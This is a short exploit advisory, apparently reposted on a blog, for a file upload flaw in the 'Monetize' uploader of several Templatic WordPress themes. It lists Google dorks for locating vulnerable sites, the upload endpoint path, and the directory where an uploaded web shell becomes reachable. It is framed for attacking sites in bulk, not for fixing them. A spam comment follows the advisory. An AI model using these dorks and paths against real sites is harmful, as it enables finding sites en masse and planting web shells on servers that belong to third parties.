#Title : Wordpress Templatic Themes
CSRF File Upload Vulnerability
[Monetize Uploader]
#Author : mdhaxor
#Category : Web Applications
#Type : PHP
#Vendor : http://templatic.com/
#Download : http://templatic.com/
wordpress-themes-store/
#Tested : Mozila, Chrome, Opera ->
Windows & Linux
#Vulnerabillity : CSRF
#DORK :
inurl:/wp-content/themes/Realestate/
inurl:/wp-content/themes/dailydeal/
inurl:/wp-content/themes/nightlife/
inurl:/wp-content/themes/5star/
inurl:/wp-content/themes/specialist/
CSRF File Upload Vulnerability
Exploit & POC : http://site-target/wp-
content/themes/Realestate/Monetize/
general/upload-file.php
File Access :
http://site-target/wp-content/themes/
Realestate/images/tmp/your_shell.php
Note : make sure the
Script CSRF equate with dork you use
Thatz All....
Awesome Blog!! Highly Informative Post. Very Thanks for sharing this information with us.Please Check out our newly pre launch projects Gbp Athens Floor Plan.
ReplyDelete